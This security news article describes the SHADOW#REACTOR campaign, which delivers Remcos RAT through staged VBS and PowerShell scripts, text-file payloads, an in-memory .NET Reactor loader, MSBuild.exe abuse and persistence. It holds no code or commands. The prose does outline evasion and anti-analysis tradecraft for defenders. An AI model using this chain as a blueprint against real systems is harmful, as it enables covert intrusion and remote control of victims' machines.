This New Windows Malware Hides in Plain Sight to Install Remcos RAT

It does not crash systems or raise alarms. It blends into everyday Windows activity and works quietly in the background. By the time it is noticed, control may already be lost.

Security teams are tracking a new malware campaign, labeled SHADOW#REACTOR, that uses a carefully staged Windows attack chain to install the Remcos Remote Access Trojan (RAT). The operation relies on scripts, text-only payloads, and trusted Windows tools to quietly gain control of infected systems. Its structure points to a financially driven effort aimed at business networks of all sizes.

What SHADOW#REACTOR is

SHADOW#REACTOR is the name researchers have assigned to an active malware delivery campaign that installs Remcos RAT using a multi-stage loader framework. Rather than deploying malware through a single executable file, the campaign breaks the infection process into several smaller steps. Each stage prepares the next one, reducing visibility and complicating detection.

Remcos RAT itself is a commercially available remote administration tool. In legitimate environments, such tools are used for IT management and remote support. In this campaign, however, Remcos is used as a backdoor. Once installed, it allows an attacker to remotely access the infected system, execute commands, manage files, and monitor activity without the user’s awareness.

The campaign appears to be broad and opportunistic. It does not focus on a single industry or geography and instead targets both large enterprises and small-to-medium businesses. There is no confirmed attribution to a known threat group, but the tooling and execution style align with financially motivated activity, including operations commonly linked to initial access sellers.

A multi-step attack built to blend in

The SHADOW#REACTOR campaign uses a chain of small, connected steps rather than a single malicious file. The infection sequence begins with an obfuscated Visual Basic Script (VBS) file. Execution is likely triggered through user interaction, such as clicking on a link delivered via a socially engineered lure.

The VBS file is launched using wscript.exe, a legitimate Windows scripting host. This initial script does not contain the Remcos payload. Instead, it functions as a launcher that executes a hidden, Base64-encoded PowerShell command.

That PowerShell code connects to a remote server and downloads the next stage of the attack. Instead of retrieving a binary executable, the malware pulls down plain text files, which are less likely to raise suspicion. These files are saved in the system’s temporary directory and contain encoded fragments used later in the attack chain.

Text-only payloads and resilience logic

A notable feature of this campaign is its reliance on text-based intermediates. After the initial PowerShell stage runs, it drops a file such as qpwoe64.txt or qpwoe32.txt, depending on whether the infected system is 64-bit or 32-bit. PowerShell then checks whether the file exists and whether it meets a minimum size threshold. If the file is missing or incomplete, the script pauses and attempts to download it again. Even if the payload fails to meet the required size within a defined time window, the execution does not terminate outright.

This behavior helps the malware remain resilient in unstable network conditions. By retrying downloads and avoiding hard failures, the attack chain reduces the chance of breaking mid-execution, increasing the likelihood of a successful infection.

In-memory reconstruction and protected loaders

Once the text-based payload passes validation, the malware constructs a secondary PowerShell script in the temporary directory. This script invokes a loader protected with .NET Reactor, a software protection tool commonly abused by malware authors to hinder analysis.

The loader reconstructs and decodes additional components directly in memory. By limiting what is written to disk, the attackers reduce the artifacts available for file-based detection and forensic analysis. This stage is also responsible for retrieving the Remcos configuration from a remote server. In addition, the loader performs checks designed to avoid analysis environments. These include techniques intended to detect debugging tools and virtual machines often used by security researchers and automated sandboxes.

Abuse of trusted Windows tools

The final stage of the attack uses MSBuild.exe, a legitimate Windows utility, to execute the Remcos payload. This technique is commonly described as “living off the land,” where attackers abuse trusted system binaries to carry out malicious actions. Because MSBuild.exe is a signed Microsoft component used in normal system and development workflows, its misuse can blend in with routine activity. This makes it harder for some security controls to distinguish malicious execution from legitimate use.

The campaign also establishes persistence. Additional scripts are dropped to re-trigger the original VBS file through wscript.exe, allowing the malware to survive system restarts and maintain long-term access.

Broad targeting with financial motives

The campaign does not appear to be highly targeted. Instead, it casts a wide net across business environments, affecting both enterprises and smaller organizations. Researchers have found no evidence linking the activity to a specific known threat group.

The overall design suggests financial motivation. The focus on persistence, stealth, and portability is consistent with activity aimed at maintaining access rather than immediate disruption. Such access can later be sold, reused, or leveraged for further attacks.

Why this campaign matters

SHADOW#REACTOR highlights how modern Windows malware has evolved. Rather than relying on a single malicious executable, attackers now chain together scripts, text files, in-memory loaders, and trusted Windows utilities to stay hidden.

For defenders, the campaign underscores the importance of monitoring script execution, PowerShell activity, and unusual use of built-in Windows tools such as MSBuild.exe. Attacks like this no longer stand out through obvious malware files. Instead, they unfold quietly within normal system behavior, making early detection more challenging.

More For You

Tech World on Edge: India’s Smartphone Source Code Proposal Sparks Security Fears

WhatsApp Ghost Pairing Scam: CERT-In Warns of Account Hacking Without OTP

KawaiiGPT lowers the bar for cybercrime with free black-hat AI

Fake APKs to Digital Arrests Mark a New Phase of Cyber Fraud in India